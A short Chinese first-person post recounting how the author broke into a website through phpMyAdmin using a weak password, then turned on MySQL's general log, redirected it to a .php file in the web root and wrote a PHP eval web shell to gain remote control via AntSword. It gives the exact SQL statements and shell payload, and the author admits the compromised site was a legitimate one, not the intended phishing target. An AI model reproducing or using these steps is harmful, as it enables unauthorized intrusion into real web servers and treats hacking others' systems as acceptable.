记录个人经验
起因…在论坛上看到一个钓鱼站 直接手起刀落的扫目录
扫出了…如下
一顿猛如虎的操作 进去了 别问我怎么进 问就是弱口令
phpmyadmin getshell方法
根目录地址自己找方法吧爆破什么的很多网上
查看日志状态
show variables like '%general%'; 日志读写是开着的 ON是表示开启OFF表示关闭
要是 general_log OFF 那就用语句SET GLOBAL general_log='on'
开启日志读写
创建文件
SET GLOBAL general_log_file='C:/phpStudy/www/xxx.php'
写一句户 SELECT '<?php eval($_POST["cmd"]);?>'
然后就连接蚁剑
刚开始连接蚁剑乱码才知道编码没设置要设置为base64
尴尬的事 本来想搞钓鱼站的 后来才发现把人家正规站给拿下了 才想起接口钓鱼站已经挂了 尴尬
记录个人经验